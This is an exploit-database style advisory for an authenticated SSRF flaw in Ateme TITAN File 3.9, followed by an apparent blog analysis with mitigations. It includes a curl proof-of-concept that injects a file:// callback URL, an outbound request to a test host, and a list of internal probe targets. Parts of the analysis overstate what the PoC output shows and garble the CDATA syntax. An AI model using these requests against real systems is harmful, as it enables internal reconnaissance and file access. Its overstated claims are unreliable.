Ateme TITAN File 3.9 - SSRF File Enumeration

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-07-11

#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration
#Exploit Author: LiquidWorm


Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.9.12.4
                  3.9.11.0
                  3.9.9.2
                  3.9.8.0

Summary: TITAN File is a multi-codec/format video transcoding
software, for mezzanine, STB and ABR VOD, PostProduction, Playout
and Archive applications. TITAN File is based on ATEME 5th Generation
STREAM compression engine and delivers the highest video quality
at minimum bitrates with accelerated parallel processing.

Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability
exists in the Titan File video transcoding software. The application
parses user supplied data in the job callback url GET parameter. Since
no validation is carried out on the parameter, an attacker can specify
an external domain and force the application to make an HTTP/DNS/File
request to an arbitrary destination. This can be used by an external
attacker for example to bypass firewalls and initiate a service, file
and network enumeration on the internal network through the affected
application.

Tested on: Microsoft Windows
           NodeJS
           Ateme KFE Software


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5781
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php


22.04.2023

--


curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
         -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
         -H "User-Agent: sunee-mode" \
         "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"

Call to file://C:\\windows\\system.ini returned 0

---

HTTP from Server
----------------

POST / HTTP/1.1
Host: ssrftest.zeroscience.mk
Accept: */*
Content-Type: application/xml
Content-Length: 192

<?xml version='1.0' encoding='UTF-8' ?>
<update>
   <id>0000</id>
   <name>dummy test job</name>
   <status>aborted</status>
   <progress>50</progress>
   <message>message</message>
</update>

Ateme TITAN File 3.9 SSRF Vulnerability: Exploiting Server-Side Request Forgery for Internal Network Enumeration

Server-Side Request Forgery (SSRF) remains one of the most dangerous and underappreciated vulnerabilities in modern web applications. While often overshadowed by more prominent issues like SQL injection or XSS, SSRF can lead to severe internal network reconnaissance, data exfiltration, and even full system compromise — especially in environments where internal services are accessible via local endpoints.

Recently, cybersecurity researcher Gjoko "LiquidWorm" Krstic disclosed a critical SSRF vulnerability in Ateme TITAN File 3.9, a widely used video transcoding software designed for broadcast, post-production, and streaming workflows. This flaw, tracked as ZSL-2023-5781, allows authenticated attackers to manipulate the callback_url parameter to perform arbitrary HTTP, DNS, and file system requests — including access to sensitive local files and internal network services.

Understanding the Vulnerability: How SSRF Works in TITAN File

At its core, SSRF exploits a lack of input validation in server-side components that process user-supplied URLs. In the case of Ateme TITAN File, the application accepts job callback URLs via the data parameter in a GET request. These URLs are parsed and processed by the backend system without proper validation, enabling attackers to specify malicious schemes such as file://, http://, or even dns://.

As demonstrated in the advisory, an attacker can craft a request that includes a file:// URL pointing to local system files:


curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
 -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
 -H "User-Agent: sunee-mode" \
 "https://10.0.0.8/cmd?data=<callback_test><url><!CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!CDATA\[encoding\]\]></state></callback_test>"

This request attempts to access C:\Windows\System.ini, a critical Windows system file. The server responds with a successful HTTP POST to an external endpoint (e.g., ssrftest.zeroscience.mk) and returns a 200 OK status, indicating the file was successfully read.

Despite the lack of direct data output in the response, the fact that the server successfully processed the file:// request proves that the application is vulnerable to SSRF — and that internal file access is possible.

Real-World Exploitation: Internal Network Enumeration

SSRF vulnerabilities are not just about reading files. They enable attackers to probe internal services and infrastructure. For example, an attacker could exploit the same mechanism to:

Access internal APIs via http://127.0.0.1:8080/admin
Perform DNS lookup via dns://internal.company.com
Read configuration files like file://c:\\\\Program Files\\\\Ateme\\\\config.xml
Trigger internal service responses through http://10.0.0.10:3000/api/health

These requests are executed from within the target system’s context, bypassing firewalls and network segmentation. This means that even if the application is behind a perimeter firewall, an attacker with authenticated access can still enumerate internal systems — a significant threat in enterprise environments.

Attack Vector and Impact

The vulnerability is only accessible to authenticated users, which reduces the attack surface compared to public SSRF exploits. However, in real-world deployments, TITAN File is often used in trusted environments where credentials are shared among teams or stored in configuration files.

Key risk factors include:

Attack Surface	Authenticated users with access to job management APIs
Exploitation Method	Malicious `callback_url` in XML-encoded `data` parameter
Targeted Protocols	`file://`, `http://`, `dns://`, `ftp://`
Impact	Internal network enumeration, sensitive file access, potential lateral movement

Even if no sensitive data is immediately exposed, the ability to probe internal endpoints can help attackers identify vulnerable services, misconfigurations, or hidden APIs — paving the way for deeper exploitation.

Technical Insight: Why XML Parsing is a Risk

The vulnerability arises from how the application parses XML-encoded data. The CDATA section in the request allows attackers to embed raw URLs without escaping, effectively bypassing basic URL sanitization.

Example:


<url><!CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url>

Here, the CDATA block ensures the URL is treated as literal text, not parsed as a structured XML element. This means the backend system receives the file:// scheme directly, without validation.

Even if the application performs basic URL checks, it fails to recognize file:// as a dangerous protocol — a common oversight in systems that assume only http:// and https:// are valid.

Recommended Mitigation Strategies

While vendors like Ateme are responsible for patching the vulnerability, organizations using TITAN File must implement defensive measures:

Input Validation: Enforce strict URL validation using a whitelist of allowed schemes (http://, https:// only).
Protocol Restriction: Disable support for file://, dns://, ftp://, and other non-HTTP protocols.
Network Isolation: Limit backend services to internal-only access and avoid exposing job callback endpoints to external users.
Role-Based Access Control (RBAC): Ensure only authorized users can modify job parameters, especially those involving callbacks.
Logging and Monitoring: Log all callback requests and flag suspicious patterns like file:// or http://127.0.0.1.

Additionally, organizations should apply the principle of least privilege — restricting access to the TITAN File interface to only necessary personnel and ensuring tokens are rotated regularly.

Conclusion: SSRF as a Stealthy Threat

The Ateme TITAN File 3.9 SSRF vulnerability underscores a critical truth: even seemingly benign features like job callbacks can become attack vectors if not properly secured. In environments where software is trusted but not audited, SSRF can remain dormant for years until exploited by a determined attacker.

As cybersecurity professionals, we must remain vigilant. This case serves as a reminder that:

Authentication does not equal security
Input parsing is a high-risk area
Internal network enumeration is a real threat

Organizations using TITAN File should update to the patched version immediately and conduct internal audits of all job-related endpoints. The cost of ignoring this vulnerability could be far greater than the effort to fix it.